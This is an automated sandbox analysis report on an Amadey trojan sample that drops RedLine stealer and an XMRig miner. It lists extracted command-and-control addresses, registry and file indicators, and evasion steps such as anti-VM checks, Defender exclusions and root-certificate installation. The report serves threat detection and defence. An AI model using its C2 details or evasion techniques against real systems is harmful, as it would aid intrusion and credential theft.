amadey | 85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41

Analysis

max time kernel
149s
max time network
148s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
24/06/2024, 01:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
Size

1.8MB
MD5

44d2d87fccae6236b0ca82141e169a23
SHA1

c88549c6a8506daa9f493870cc943e37eabe0cac
SHA256

85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41
SHA512

faaa6cf93e8940c08b06feda89646e6c40bf9a5811c2af7d2f466d57fd62c430700c2c54a7fd8a4e9a826299fef0633213d1d4a8e3ad9b395812c865d3403bf3
SSDEEP

49152:Os04d4yuNrFivU/BwTeOia6ulWW1SQsS5C:zd4fkUZIiPRW1SA

Score

10^/10

amadey redline xmrig ama e76b71 discovery evasion execution infostealer miner persistence spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

185.215.113.67:40960

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00090000000161ee-26.dat	family_redline
behavioral1/memory/2616-36-0x0000000000140000-0x0000000000190000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/2516-972-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2516-971-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2516-974-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2516-977-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2516-975-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2516-976-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2516-978-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2516-1194-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2516-1209-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2576	powershell.exe
1184	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Executes dropped EXE 12 IoCs

pid	Process
2980	axplong.exe
2616	ama.exe
1748	gold.exe
1260	lummac2.exe
2424	NewLatest.exe
1836	Hkbsse.exe
2676	6.exe
1932	legs.exe
1512	taskweaker.exe
2744	FirstZ.exe
476	Process not Found
1532	reakuqnanrkn.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine	85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
Key opened	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine	axplong.exe

Loads dropped DLL 20 IoCs

pid	Process
1728	85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
2980	axplong.exe
2980	axplong.exe
2276	WerFault.exe
2276	WerFault.exe
2276	WerFault.exe
2980	axplong.exe
2980	axplong.exe
2980	axplong.exe
2424	NewLatest.exe
2616	ama.exe
2980	axplong.exe
2604	WerFault.exe
2604	WerFault.exe
2604	WerFault.exe
2980	axplong.exe
2980	axplong.exe
1836	Hkbsse.exe
1836	Hkbsse.exe
476	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2516-967-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-972-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-970-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-968-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-966-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-971-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-969-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-974-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-977-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-975-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-976-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-978-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-1194-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2516-1209-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
64	pastebin.com
65	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1908	powercfg.exe
1976	powercfg.exe
1988	powercfg.exe
2256	powercfg.exe
3008	powercfg.exe
2188	powercfg.exe
2180	powercfg.exe
1728	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1728	85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
2980	axplong.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1532 set thread context of 1784	1532	reakuqnanrkn.exe	101
PID 1532 set thread context of 2516	1532	reakuqnanrkn.exe	104

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
File created	C:\Windows\Tasks\Hkbsse.job	NewLatest.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2968	sc.exe
1476	sc.exe
1524	sc.exe
2612	sc.exe
2208	sc.exe
1428	sc.exe
1536	sc.exe
1664	sc.exe
1588	sc.exe
1504	sc.exe
2640	sc.exe
1572	sc.exe
408	sc.exe
2356	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2276	1748	WerFault.exe	32
2604	1932	WerFault.exe	42

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c94b251c1ec4c945bd3dde44c3089c4900000000020000000000106600000001000020000000b7ab6745729d190c9d2b25d19a9b096aaa1fae930ba3e95ffc61d6d11c526331000000000e80000000020000200000001c98daaee52e5c44848a097d35020a24793178c56100b12a65f6389c84eb39cb900000009534c282ee31bf54a23d56755aac9fff6237d75ea8e5047df434e530238d6340dc85df4d0c9392af84a8987e0f6ef83c481ebc81ba301e903b6acea0fb9036d46f87599753bbfe63d8a81bb21140299f1894dbbb8210fb53a7551acf2c616bfb185e7916266d084001d18194aaefc9a9ab9cd32dd6c30941cfeb62b4e2bb9d24b5c06dacbdd89ad1d7900840e4ac092140000000599d072526fefdea1f0b0c2d202e4fd6629cad3903d72c42128b827def72a6c100319f23917aa8ffe07df6aa112bc0c58bf255467318ec2e8e05fc161d680271	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "425353590"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{39DBC5E1-31C7-11EF-AD12-DE87C8C490F0} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c94b251c1ec4c945bd3dde44c3089c490000000002000000000010660000000100002000000089c13b241e58d3ff16dd6ef98d51263736f3e18bc1b6cb704871c3de1b33960d000000000e8000000002000020000000a57f94ed89580bf7d10264083dae02dc29db8cdd9417b1853bd7ae6d7a2bb4c6200000008fc5b700f36de9ac65b72075b24e0dfddc7e66636c4fe1c023943314b839401440000000d80b629b399d8e35f7dc6ddf29eebbb6f4a04ee8ffe57a5f7f9c31d0a625267215f48772526e7a98dc7eac4b516371dea68f822a87389f8e8926b3c6e61591aa	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 706df10fd4c5da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0a5b121d4c5da01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	axplong.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	axplong.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	axplong.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ama.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ama.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1728	85d2e1dbbcd7f16fe0fddf6955bfd310ffdfe172ea43a976d86db8d385552f41.exe
2980	axplong.exe
2616	ama.exe
2616	ama.exe
2616	ama.exe
2676	6.exe
2744	FirstZ.exe
2576	powershell.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
2744	FirstZ.exe
1532	reakuqnanrkn.exe
1184	powershell.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
1532	reakuqnanrkn.exe
2516	explorer.exe
2516	explorer.exe
2516	explorer.exe
2516	explorer.exe
2516	explorer.exe
2516	explorer.exe
2516	explorer.exe
2516	explorer.exe
2516	explorer.exe
2516	explorer.exe
